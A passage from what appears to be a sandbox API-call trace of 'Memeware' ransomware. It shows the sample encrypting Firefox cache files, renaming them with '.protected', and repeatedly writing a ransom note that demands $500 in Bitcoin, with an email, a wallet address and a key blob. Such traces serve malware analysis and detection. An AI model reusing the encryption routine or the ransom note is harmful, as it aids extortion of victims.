returned -1 [0086.244] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\.") returned 102 [0086.244] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.245] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.245] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.245] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.245] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.245] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.245] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.245] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\..") returned 103 [0086.245] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.245] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.245] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.245] lstrcmpiW (lpString1="28E95d01", lpString2="Windows") returned -1 [0086.245] lstrcmpiW (lpString1="28E95d01", lpString2="Program Files") returned -1 [0086.245] lstrcmpiW (lpString1="28E95d01", lpString2="Program Files (x86)") returned -1 [0086.245] lstrcmpiW (lpString1="28E95d01", lpString2="$Recycle.bin") returned 1 [0086.245] lstrcmpiW (lpString1="28E95d01", lpString2="System Volume Information") returned -1 [0086.245] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01") returned 109 [0086.245] StrStrIW (lpFirst="28E95d01", lpSrch=".protected") returned 0x0 [0086.245] lstrcmpW (lpString1="28E95d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.245] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.245] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01") returned 109 [0086.246] StrStrW (lpFirst="28E95d01", lpSrch=".txt") returned 0x0 [0086.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01") returned 109 [0086.246] StrStrW (lpFirst="28E95d01", lpSrch=".rar") returned 0x0 [0086.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01") returned 109 [0086.246] StrStrW (lpFirst="28E95d01", lpSrch=".zip") returned 0x0 [0086.246] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.255] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.255] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.256] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.256] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.256] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.256] CloseHandle (hObject=0x160) returned 1 [0086.256] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01.protected") returned 119 [0086.256] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01.protected")) returned 1 [0086.257] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.257] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.257] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\RESTORE_FILES.txt") returned 118 [0086.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.257] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.258] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.258] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.258] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.258] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.258] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.258] CloseHandle (hObject=0x15c) returned 1 [0086.258] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.259] lstrcmpiW (lpString1="E0", lpString2="Windows") returned -1 [0086.259] lstrcmpiW (lpString1="E0", lpString2="Program Files") returned -1 [0086.259] lstrcmpiW (lpString1="E0", lpString2="Program Files (x86)") returned -1 [0086.259] lstrcmpiW (lpString1="E0", lpString2="$Recycle.bin") returned 1 [0086.259] lstrcmpiW (lpString1="E0", lpString2="System Volume Information") returned -1 [0086.259] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0") returned 100 [0086.259] lstrcmpW (lpString1="E0", lpString2=".") returned 1 [0086.259] lstrcmpW (lpString1="E0", lpString2="..") returned 1 [0086.259] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\*") returned 102 [0086.259] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.259] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.259] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.259] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.259] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.260] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.260] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\.") returned 102 [0086.260] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.260] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.260] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.260] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.260] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.260] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.260] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.260] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\..") returned 103 [0086.260] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.260] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.260] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.260] lstrcmpiW (lpString1="F17B2d01", lpString2="Windows") returned -1 [0086.260] lstrcmpiW (lpString1="F17B2d01", lpString2="Program Files") returned -1 [0086.260] lstrcmpiW (lpString1="F17B2d01", lpString2="Program Files (x86)") returned -1 [0086.260] lstrcmpiW (lpString1="F17B2d01", lpString2="$Recycle.bin") returned 1 [0086.260] lstrcmpiW (lpString1="F17B2d01", lpString2="System Volume Information") returned -1 [0086.260] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01") returned 109 [0086.260] StrStrIW (lpFirst="F17B2d01", lpSrch=".protected") returned 0x0 [0086.260] lstrcmpW (lpString1="F17B2d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.260] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.260] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01") returned 109 [0086.261] StrStrW (lpFirst="F17B2d01", lpSrch=".txt") returned 0x0 [0086.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01") returned 109 [0086.261] StrStrW (lpFirst="F17B2d01", lpSrch=".rar") returned 0x0 [0086.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01") returned 109 [0086.261] StrStrW (lpFirst="F17B2d01", lpSrch=".zip") returned 0x0 [0086.261] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.272] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.272] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.272] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.272] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.272] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.272] CloseHandle (hObject=0x160) returned 1 [0086.272] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01.protected") returned 119 [0086.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01.protected")) returned 1 [0086.273] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.273] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.273] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\RESTORE_FILES.txt") returned 118 [0086.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.274] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.274] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.275] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.275] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.275] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.275] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.275] CloseHandle (hObject=0x15c) returned 1 [0086.275] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.275] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.275] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\RESTORE_FILES.txt") returned 115 [0086.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.276] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.276] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.276] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.277] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.277] lstrlenA 